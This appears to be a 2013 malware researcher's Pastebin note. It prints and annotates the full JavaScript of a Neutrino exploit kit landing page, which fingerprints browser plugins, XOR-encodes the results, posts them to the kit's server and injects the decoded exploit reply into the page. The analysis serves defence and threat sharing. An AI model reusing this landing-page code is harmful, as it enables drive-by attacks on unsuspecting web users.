MalwareMustDie

#MalwareMustDie! New form of Neutrino EK landing page?

Jul 26th, 2013
586
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!
  2. // My personal note..
  3. // New form of Neutrino EK landing page?
  4. // A quest! Where's the XOR data now? :-D
  5.  
  6.  
  7. <script src='xsvhwjx.js'></script>
  8. <script src='qmqsfiutp.js'>
  9. </script><script src='hrcl.js'></script>
  10. <link href='xbbcukphokdo.css' rel='stylesheet'>
  11. <link href='nhpgbsrcogf.css' rel='stylesheet'>
  12. <link href='bbehoufqwh.css' rel='stylesheet'>
  13.  
  14. <script src='gdhclsjileqh.js'></script>
  15. <script src='nrezixfqsy.js'></script>
  16. <script src='sgxvswm.js'></script>
  17. <script src='ztblmkuxokfcyxgy.js'></script>
  18. <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect??
  19. <script src='dwwccp.js'></script>
  20. <script src='zkbvwzvq.js'></script>
  21.  
  22.  
  23. <script>
  24.  $(document).ready(function()
  25.  {
  26.    rq(
  27.         "51f2394faaa2cc390a075f4c",
  28.         "eyhuui",        // <== @malforsec & @malwaremustdie: OK this is the key :-)
  29.         "uvkotuiae",    // <=== @malwaremustdie: POST command value
  30.         "ngrdddfrrlrzro",
  31.         "gfsjmndvvz"
  32.      )
  33.  }
  34.  );
  35.  function rq(a,c,f,e,g)
  36.  {
  37.    var d=PluginDetect.getVersion,b=[];  // // <== @malwaremustdie: PoC of PluginDetect v0.8.0
  38.    b.push("hid:::"+a);
  39.    b.push("adobe_reader:::"+d("AdobeReader"));
  40.    b.push("java:::"+d("Java"));
  41.    b.push("flash:::"+d("Flash"));
  42.    b.push("quick_time:::"+d("QuickTime"));
  43.    b.push("real_player:::"+d("RealPlayer"));
  44.    b.push("shockwave:::"+d("Shockwave"));
  45.    b.push("silver_light:::"+d("Silverlight"));
  46.    b.push("vlc:::"+d("VLC"));
  47.    b.push("wmp:::"+d("WMP"));
  48.    b.push("office:::"+office_ver());
  49.    a={};
  50.    a[e]=c;                                        // <=== c = "51f2394faaa2cc390a075f4c"
  51.    a[g]=encodeURIComponent(www(b.join(";;;"),c));  // <== @malwaremustdie: Assembling the POST query.
  52.    $.post(f,a,function(a,
  53.    b)
  54.    {
  55.      $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function.
  56.    }
  57.    )
  58.  }
  59.  function www(a,c)        // <=== @malwaremustdie: XOR function name in camouflaged
  60.  {                      
  61.    for(var f="",e=0,g=0,e=0;e<a.length;e++) // <=== @malwaremustdie: XOR logic
  62.        g=Math.floor(e%c.length),
  63.        f+=String.fromCharCode(a.charCodeAt(e)^c.charCodeAt(g));
  64.    return f
  65.  }
  66.  function office_ver()
  67.  {
  68.    var a=0,c=0;
  69.    try
  70.    {
  71.      a=new ActiveXObject("SharePoint.OpenDocuments.4")
  72.    }
  73.    catch(f)
  74.    {
  75.    }
  76.    try
  77.    {
  78.      c=new ActiveXObject("SharePoint.OpenDocuments.3")
  79.    }
  80.    catch(e)
  81.    {
  82.    }  // <=== @malwaremustdie: here goes the exploit payloads access...
  83.    return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null
  84.  };
  85.  
  86. </script>
  87.  
  88.  
  89. ----
  90. #MalwareMustDie!
  91. @unixfreaxjp ~]$ date
  92. Sat Jul 27 01:17:40 JST 2013
RAW Paste Data